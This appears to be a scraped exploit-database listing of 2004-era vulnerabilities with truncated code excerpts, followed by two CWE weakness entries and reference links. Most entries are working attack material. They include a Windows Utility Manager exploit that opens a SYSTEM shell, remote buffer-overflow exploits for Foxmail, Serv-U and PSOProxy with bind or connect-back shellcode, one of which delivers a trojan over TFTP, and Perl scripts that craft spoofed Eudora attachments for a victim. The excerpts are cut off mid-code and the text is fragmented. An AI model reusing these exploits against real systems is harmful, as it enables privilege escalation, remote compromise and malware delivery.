Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
---
// source: https://www.securityfocus.com/bid/10710/info
The Microsoft POSIX subsystem implementation is prone to a local buffer overflow vulnerability.
A local attacker may exploit this vulnerability in order to run code with elevated privileges, fully compromising the vulnerable computer.
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
exploitdb·2004-07-14
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
---
//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";
// run utility manager
// system("utilman.exe /start");
// Sleep(500);
lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
return 0;
}
PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button
in the taskbar o
Exploit-DB
BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
exploitdb·2004-06-22
CVE-2004-0616 BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
---
source: https://www.securityfocus.com/bid/10589/info
BT Voyager 2000 Wireless ADSL Router is reported prone to a sensitive information disclosure vulnerability.
It is reported that the 'public' SNMP MIB community strings, which are world readable by default, contain sensitive information pertaining to the internal protected network.
Data collected by exploiting this vulnerability may be used in further attacks against the victim network.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SN
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
exploitdb·2004-04-25
CVE-2004-0214 Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
---
source: https://www.securityfocus.com/bid/10213/info
Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition.
This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user.
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
Microsoft Windows XP/2000 - TCP Connection Reset
exploitdb·2004-04-22
CVE-2004-0230 Microsoft Windows XP/2000 - TCP Connection Reset
Microsoft Windows XP/2000 - TCP Connection Reset
---
{
AFX TCP Reset by Aphex
http://www.iamaphex.cjb.net
[email protected]
Compile with Delphi 5/6/7
}
program Project1;
{$APPTYPE CONSOLE}
uses
Windows;
type
TBufferArray = array[0..65535] of byte;
type
iph = record
ip_verlen: byte;
ip_tos: byte;
ip_len: word;
ip_id: word;
ip_offset: word;
ip_ttl: byte;
ip_protocol: byte;
ip_checksum: word;
ip_saddr: longword;
ip_daddr: longword;
end;
tcph = record
th_sport: word;
th_dport: word;
th_seq: longword;
th_ack: longword;
th_len: byte;
th_flags: byte;
th_win: word;
th_checksum: word;
th_upr: word;
end;
sb = packed record
sb1, sb2, sb3, sb4: char;
end;
sw = packed record
sw1, sw2: word;
end;
TInAddr = record
case integer of
0: (ssb: sb);
1: (ssw: sw);
2: (saddr: longint);
end;
TSock
Exploit-DB
Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
exploitdb·2004-03-23
CVE-2004-2719 Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
---
/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author : xfocus
* : http://www.xfocus.org
* Maintain : XFOCUS Security Team
* Version : 0.2
*
* Test : Windows 2000 server GB/XP professional
* + Foxmail 5.0.300.0
* Notes : unpublished vul.
* Greets : all member of XFOCUS Security Team.
* Complie : cl fmx.c
* Usage : fmx
* mail_addr: email address we wantto hack
* tftp_server: run a tftp server and have a a.exe trojan
* smtp_server: SMTP server don't need login, we send the email thru it
*
* Date : 2004-02-27
* Revised : 2004-03-05
*
* Revise History:
* 2003-03-0
Exploit-DB
Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
exploitdb·2004-02-26
CVE-2004-0326 Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
---
/*================[CRPT - FrenchTeam] =================*
[Coromputer Security Advisory] - [CRPTSA-01]
*=================== [Summary] =====================*
Software : GateKeeper Pro 4.7
Platforms : win32
Risk : High
Impact : Buffer overflow
Release Date : 2004-02-23
*=================== [Description] ====================*
there is a trivial buffer overflow in the web proxy (default port 3128).
*==================== [Details] ======================*
Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
violation. Other services not tested, but they can be vulnerable too. Exact
version can be checked from the administration service (default port 2000).
*==================== [Exploits] =
Exploit-DB
PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
exploitdb·2004-02-26
CVE-2004-0313 PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
---
/*
Copyright © Rosiello Security
http www rosiello org
-== Remote Exploit for PSOProxy version v0.91 ==--
Code by: rave
Contact: [email protected]
Date: Feb 2004
Bug found by: Donato Ferrante
There is a vulnerability found in the PSOProxy server.
An attacker can execute arbitrary code exploiting remotely a buffer overflow.
The exploit sends:
GET /
This spawns a bindshell on the victim at port 28876..
Usage psoproxy-exploit.exe
Target Number Target Name Stack Adress
============= =========== ===========
0 Demo 0xBADC0DED
1 Windows XP Home Edtion SP1. 0x00D2FDDA
2 Windows XP Pro Edtion SP1. 0x00EDFDDC
3 Win2k Pro Edtion. 0x00BBFDDC
psoproxy-exploit localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:808
Exploit-DB
Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
exploitdb·2004-02-09
CVE-2004-0281 Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
---
source: https://www.securityfocus.com/bid/9617/info
It has been reported that Resin may be prone to an information disclosure vulnerability that may allow an attacker to disclose directory listings by passing malicious data via a URI parameter.
The issue has been reported to present itself on Windows NT/2000 systems running Apache 1.3.29 and Resin 2.1.12.
http://www.example.com/WEB-INF../
Exploit-DB
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
exploitdb·2004-01-27
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
---
/*
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*/
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shell
Exploit-DB
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
exploitdb·2003-11-25
CVE-2000-0342 Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
---
source: https://www.securityfocus.com/bid/9101/info
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
** May 21, 2004 - Eudora version 6.1.1 has been released; however, it is reported that the new version is vulnerable to this issue as well.
#!/usr/bin/perl --
use MIME::Base64;
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "This is a multi-part message in MIME for
Exploit-DB
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
exploitdb·2003-11-25
CVE-2000-0342 Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
---
source: https://www.securityfocus.com/bid/9101/info
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
** May 21, 2004 - Eudora version 6.1.1 has been released; however, it is reported that the new version is vulnerable to this issue as well.
#!/usr/bin/perl --
use MIME::Base64;
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
print "\n";
print "Pipe the output of this script into: sendmail -i victim\n";
print "
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments poin
CWE
Path Equivalence: 'filename.' (Trailing Dot)
mitre_cwe·CVSS 5.0
CVE-2000-1114 [MEDIUM] CWE-42 Path Equivalence: 'filename.' (Trailing Dot)
CWE-42: Path Equivalence: 'filename.' (Trailing Dot)
The product accepts path input in the form of trailing dot ('filedir.') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism.
Observed Examples:
CVE-2000-1114: Source code disclosure using trailing dot
CVE-2002-1986: Source code disclosure using trailing dot
CVE-2004-2213: Source code disclosure using trailing dot
CVE-2005-3293: Source code disclosure using trailing dot
CVE-2004-0061: Bypass directory access restrictions using trailing dot in URL
CVE-2000-1133: Bypass directory access rest
CWE
Improper Handling of Missing Values
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-230 Improper Handling of Missing Values
CWE-230: Improper Handling of Missing Values
The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Unexpected State.
Examples:
This Android application has registered to handle a URL when sent an intent:
The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called.
Observed Examples:
CVE-2002-0422: Blank Host header triggers resultant infoleak.
CVE-2000-1006: Blank "charset" attribute in MIME header triggers crash.
CVE-2004-150
http://marc.info/?l=bugtraq&m=108378804809891&w=2
http://osvdb.org/52223
http://secunia.com/advisories/11553
http://www.securityfocus.com/archive/1/488452/100/0/threaded
http://www.securityfocus.com/bid/10282
http://www.securityfocus.com/bid/27932
http://www.waraxe.us/index.php?modname=sa&id=27
https://exchange.xforce.ibmcloud.com/vulnerabilities/16074
2004-05-05
Published